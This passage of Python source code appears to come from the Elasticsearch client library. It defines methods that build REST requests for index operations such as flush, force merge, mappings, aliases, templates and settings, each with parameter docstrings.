) -> ObjectApiResponse[Any]:
"""
Performs the flush operation on one or more indices.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-flush.html>`_
:param index: A comma-separated list of index names; use `_all` or empty string
for all indices
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param force: Whether a flush should be forced even if it is not necessarily
            needed, i.e. if no changes will be committed to the index. This is useful if
transaction log IDs should be incremented even if no uncommitted changes
are present. (This setting can be considered as internal)
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param wait_if_ongoing: If set to true the flush operation will block until the
flush can be executed if another flush operation is already executing. The
            default is true. If set to false the flush will be skipped if another
flush operation is already running.
"""
if index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_flush"
else:
__path = "/_flush"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if force is not None:
__query["force"] = force
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if pretty is not None:
__query["pretty"] = pretty
if wait_if_ongoing is not None:
__query["wait_if_ongoing"] = wait_if_ongoing
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("POST", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def forcemerge(
self,
*,
index: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
flush: Optional[bool] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
max_num_segments: Optional[int] = None,
only_expunge_deletes: Optional[bool] = None,
pretty: Optional[bool] = None,
wait_for_completion: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Performs the force merge operation on one or more indices.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-forcemerge.html>`_
:param index: A comma-separated list of index names; use `_all` or empty string
to perform the operation on all indices
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param flush: Specify whether the index should be flushed after performing the
operation (default: true)
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param max_num_segments: The number of segments the index should be merged into
(default: dynamic)
:param only_expunge_deletes: Specify whether the operation should only expunge
deleted documents
:param wait_for_completion: Should the request wait until the force merge is
completed.
"""
if index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_forcemerge"
else:
__path = "/_forcemerge"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if flush is not None:
__query["flush"] = flush
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if max_num_segments is not None:
__query["max_num_segments"] = max_num_segments
if only_expunge_deletes is not None:
__query["only_expunge_deletes"] = only_expunge_deletes
if pretty is not None:
__query["pretty"] = pretty
if wait_for_completion is not None:
__query["wait_for_completion"] = wait_for_completion
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("POST", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def get(
self,
*,
index: Any,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
flat_settings: Optional[bool] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
include_defaults: Optional[bool] = None,
local: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Returns information about one or more indices.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-get-index.html>`_
:param index: Comma-separated list of data streams, indices, and index aliases
used to limit the request. Wildcard expressions (*) are supported.
:param allow_no_indices: Ignore if a wildcard expression resolves to no concrete
indices (default: false)
:param expand_wildcards: Type of index that wildcard expressions can match. If
the request can target data streams, this argument determines whether wildcard
expressions match hidden data streams. Supports comma-separated values, such
as open,hidden.
:param flat_settings: If true, returns settings in flat format.
:param ignore_unavailable: If false, requests that target a missing index return
an error.
:param include_defaults: If true, return all default settings in the response.
:param local: If true, the request retrieves information from the local node
only. Defaults to false, which means information is retrieved from the master
node.
:param master_timeout: Period to wait for a connection to the master node. If
no response is received before the timeout expires, the request fails and
returns an error.
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
__path = f"/{_quote(index)}"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if flat_settings is not None:
__query["flat_settings"] = flat_settings
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if include_defaults is not None:
__query["include_defaults"] = include_defaults
if local is not None:
__query["local"] = local
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def get_alias(
self,
*,
index: Optional[Any] = None,
name: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
local: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Returns an alias.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-aliases.html>`_
:param index: A comma-separated list of index names to filter aliases
:param name: A comma-separated list of alias names to return
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param local: Return local information, do not retrieve the state from master
node (default: false)
"""
if index not in SKIP_IN_PATH and name not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_alias/{_quote(name)}"
elif index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_alias"
elif name not in SKIP_IN_PATH:
__path = f"/_alias/{_quote(name)}"
else:
__path = "/_alias"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if local is not None:
__query["local"] = local
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def get_data_stream(
self,
*,
name: Optional[Any] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Returns data streams.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:param name: A comma-separated list of data streams to get; use `*` to get all
data streams
:param expand_wildcards: Whether wildcard expressions should get expanded to
open or closed indices (default: open)
"""
if name not in SKIP_IN_PATH:
__path = f"/_data_stream/{_quote(name)}"
else:
__path = "/_data_stream"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def get_field_mapping(
self,
*,
fields: Any,
index: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
include_defaults: Optional[bool] = None,
local: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Returns mapping for one or more fields.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-get-field-mapping.html>`_
:param fields: A comma-separated list of fields
:param index: A comma-separated list of index names
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param include_defaults: Whether the default mapping values should be returned
as well
:param local: Return local information, do not retrieve the state from master
node (default: false)
"""
if fields in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'fields'")
if index not in SKIP_IN_PATH and fields not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_mapping/field/{_quote(fields)}"
elif fields not in SKIP_IN_PATH:
__path = f"/_mapping/field/{_quote(fields)}"
else:
raise ValueError("Couldn't find a path for the given parameters")
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if include_defaults is not None:
__query["include_defaults"] = include_defaults
if local is not None:
__query["local"] = local
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def get_index_template(
self,
*,
name: Optional[Any] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
flat_settings: Optional[bool] = None,
human: Optional[bool] = None,
local: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Returns an index template.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:param name: Comma-separated list of index template names used to limit the request.
Wildcard (*) expressions are supported.
:param flat_settings: If true, returns settings in flat format.
:param local: If true, the request retrieves information from the local node
only. Defaults to false, which means information is retrieved from the master
node.
:param master_timeout: Period to wait for a connection to the master node. If
no response is received before the timeout expires, the request fails and
returns an error.
"""
if name not in SKIP_IN_PATH:
__path = f"/_index_template/{_quote(name)}"
else:
__path = "/_index_template"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if flat_settings is not None:
__query["flat_settings"] = flat_settings
if human is not None:
__query["human"] = human
if local is not None:
__query["local"] = local
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def get_mapping(
self,
*,
index: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
local: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Returns mappings for one or more indices.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-get-mapping.html>`_
:param index: A comma-separated list of index names
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param local: Return local information, do not retrieve the state from master
node (default: false)
:param master_timeout: Specify timeout for connection to master
"""
if index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_mapping"
else:
__path = "/_mapping"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if local is not None:
__query["local"] = local
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def get_settings(
self,
*,
index: Optional[Any] = None,
name: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
flat_settings: Optional[bool] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
include_defaults: Optional[bool] = None,
local: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Returns settings for one or more indices.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-get-settings.html>`_
:param index: A comma-separated list of index names; use `_all` or empty string
to perform the operation on all indices
:param name: The name of the settings that should be included
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param flat_settings: Return settings in flat format (default: false)
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param include_defaults: Whether to return all default setting for each of the
indices.
:param local: Return local information, do not retrieve the state from master
node (default: false)
:param master_timeout: Specify timeout for connection to master
"""
if index not in SKIP_IN_PATH and name not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_settings/{_quote(name)}"
elif index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_settings"
elif name not in SKIP_IN_PATH:
__path = f"/_settings/{_quote(name)}"
else:
__path = "/_settings"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if flat_settings is not None:
__query["flat_settings"] = flat_settings
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if include_defaults is not None:
__query["include_defaults"] = include_defaults
if local is not None:
__query["local"] = local
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def get_template(
self,
*,
name: Optional[Any] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
flat_settings: Optional[bool] = None,
human: Optional[bool] = None,
local: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Returns an index template.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:param name: The comma separated names of the index templates
:param flat_settings: Return settings in flat format (default: false)
:param local: Return local information, do not retrieve the state from master
node (default: false)
:param master_timeout: Explicit operation timeout for connection to master node
"""
if name not in SKIP_IN_PATH:
__path = f"/_template/{_quote(name)}"
else:
__path = "/_template"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if flat_settings is not None:
__query["flat_settings"] = flat_settings
if human is not None:
__query["human"] = human
if local is not None:
__query["local"] = local
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def migrate_to_data_stream(
self,
*,
name: Any,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Migrates an alias to a data stream
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:param name: The name of the alias to migrate
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_data_stream/_migrate/{_quote(name)}"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("POST", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def open(
self,
*,
index: Any,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
timeout: Optional[Any] = None,
wait_for_active_shards: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Opens an index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-open-close.html>`_
:param index: A comma separated list of indices to open
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param master_timeout: Specify timeout for connection to master
:param timeout: Explicit operation timeout
:param wait_for_active_shards: Sets the number of active shards to wait for before
the operation returns.
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
__path = f"/{_quote(index)}/_open"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if timeout is not None:
__query["timeout"] = timeout
if wait_for_active_shards is not None:
__query["wait_for_active_shards"] = wait_for_active_shards
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("POST", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def promote_data_stream(
self,
*,
name: Any,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Promotes a data stream from a replicated data stream managed by CCR to a regular
data stream
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:param name: The name of the data stream
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_data_stream/_promote/{_quote(name)}"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("POST", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
)
def put_alias(
self,
*,
index: Any,
name: Any,
error_trace: Optional[bool] = None,
filter: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
index_routing: Optional[Any] = None,
is_write_index: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
routing: Optional[Any] = None,
search_routing: Optional[Any] = None,
timeout: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Creates or updates an alias.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-aliases.html>`_
:param index: A comma-separated list of index names the alias should point to
(supports wildcards); use `_all` to perform the operation on all indices.
:param name: The name of the alias to be created or updated
:param filter:
:param index_routing:
:param is_write_index:
:param master_timeout: Specify timeout for connection to master
:param routing:
:param search_routing:
:param timeout: Explicit timestamp for the document
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/{_quote(index)}/_alias/{_quote(name)}"
__query: Dict[str, Any] = {}
__body: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if filter is not None:
__body["filter"] = filter
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if index_routing is not None:
__body["index_routing"] = index_routing
if is_write_index is not None:
__body["is_write_index"] = is_write_index
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if routing is not None:
__body["routing"] = routing
if search_routing is not None:
__body["search_routing"] = search_routing
if timeout is not None:
__query["timeout"] = timeout
if not __body:
__body = None # type: ignore[assignment]
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
if __body is not None:
__headers["content-type"] = "application/json"
return self._perform_request("PUT", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
parameter_aliases={"_meta": "meta"},
)
def put_index_template(
self,
*,
name: Any,
composed_of: Optional[List[Any]] = None,
create: Optional[bool] = None,
data_stream: Optional[Any] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
index_patterns: Optional[Any] = None,
meta: Optional[Any] = None,
pretty: Optional[bool] = None,
priority: Optional[int] = None,
template: Optional[Any] = None,
version: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Creates or updates an index template.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:param name: Index or template name
:param composed_of:
:param create: Whether the index template should only be added if new or can
also replace an existing one
:param data_stream:
:param index_patterns:
:param meta:
:param priority:
:param template:
:param version:
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_index_template/{_quote(name)}"
__body: Dict[str, Any] = {}
__query: Dict[str, Any] = {}
if composed_of is not None:
__body["composed_of"] = composed_of
if create is not None:
__query["create"] = create
if data_stream is not None:
__body["data_stream"] = data_stream
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if index_patterns is not None:
__body["index_patterns"] = index_patterns
if meta is not None:
__body["_meta"] = meta
if pretty is not None:
__query["pretty"] = pretty
if priority is not None:
__body["priority"] = priority
if template is not None:
__body["template"] = template
if version is not None:
__body["version"] = version
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json", "content-type": "application/json"}
return self._perform_request("PUT", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
parameter_aliases={
"_field_names": "field_names",
"_meta": "meta",
"_routing": "routing",
"_source": "source",
},
)
def put_mapping(
self,
*,
index: Any,
allow_no_indices: Optional[bool] = None,
date_detection: Optional[bool] = None,
dynamic: Optional[Any] = None,
dynamic_date_formats: Optional[List[str]] = None,
dynamic_templates: Optional[Union[Dict[str, Any], List[Dict[str, Any]]]] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
field_names: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
master_timeout: Optional[Any] = None,
meta: Optional[Dict[str, Any]] = None,
numeric_detection: Optional[bool] = None,
pretty: Optional[bool] = None,
properties: Optional[Dict[Any, Any]] = None,
routing: Optional[Any] = None,
runtime: Optional[Any] = None,
source: Optional[Any] = None,
timeout: Optional[Any] = None,
write_index_only: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Updates the index mappings.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-put-mapping.html>`_
:param index: A comma-separated list of index names the mapping should be added
to (supports wildcards); use `_all` or omit to add the mapping on all indices.
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param date_detection: Controls whether dynamic date detection is enabled.
:param dynamic: Controls whether new fields are added dynamically.
:param dynamic_date_formats: If date detection is enabled then new string fields
are checked against 'dynamic_date_formats' and if the value matches then
a new date field is added instead of string.
:param dynamic_templates: Specify dynamic templates for the mapping.
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param field_names: Control whether field names are enabled for the index.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param master_timeout: Specify timeout for connection to master
:param meta: A mapping type can have custom meta data associated with it. These
are not used at all by Elasticsearch, but can be used to store application-specific
metadata.
:param numeric_detection: Automatically map strings into numeric data types for
all fields.
:param properties: Mapping for a field. For new fields, this mapping can include:
- Field name - Field data type - Mapping parameters
:param routing: Enable making a routing value required on indexed documents.
:param runtime: Mapping of runtime fields for the index.
:param source: Control whether the _source field is enabled on the index.
:param timeout: Explicit operation timeout
:param write_index_only: When true, applies mappings only to the write index
of an alias or data stream
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
__path = f"/{_quote(index)}/_mapping"
__query: Dict[str, Any] = {}
__body: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if date_detection is not None:
__body["date_detection"] = date_detection
if dynamic is not None:
__body["dynamic"] = dynamic
if dynamic_date_formats is not None:
__body["dynamic_date_formats"] = dynamic_date_formats
if dynamic_templates is not None:
__body["dynamic_templates"] = dynamic_templates
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if field_names is not None:
__body["_field_names"] = field_names
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if meta is not None:
__body["_meta"] = meta
if numeric_detection is not None:
__body["numeric_detection"] = numeric_detection
if pretty is not None:
__query["pretty"] = pretty
if properties is not None:
__body["properties"] = properties
if routing is not None:
__body["_routing"] = routing
if runtime is not None:
__body["runtime"] = runtime
if source is not None:
__body["_source"] = source
if timeout is not None:
__query["timeout"] = timeout
if write_index_only is not None:
__query["write_index_only"] = write_index_only
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json", "content-type": "application/json"}
return self._perform_request("PUT", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_name="settings",
)
def put_settings(
self,
*,
settings: Any,
index: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
flat_settings: Optional[bool] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
master_timeout: Optional[Any] = None,
preserve_existing: Optional[bool] = None,
pretty: Optional[bool] = None,
timeout: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Updates the index settings.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-update-settings.html>`_
:param settings:
:param index: A comma-separated list of index names; use `_all` or empty string
to perform the operation on all indices
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param flat_settings: Return settings in flat format (default: false)
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
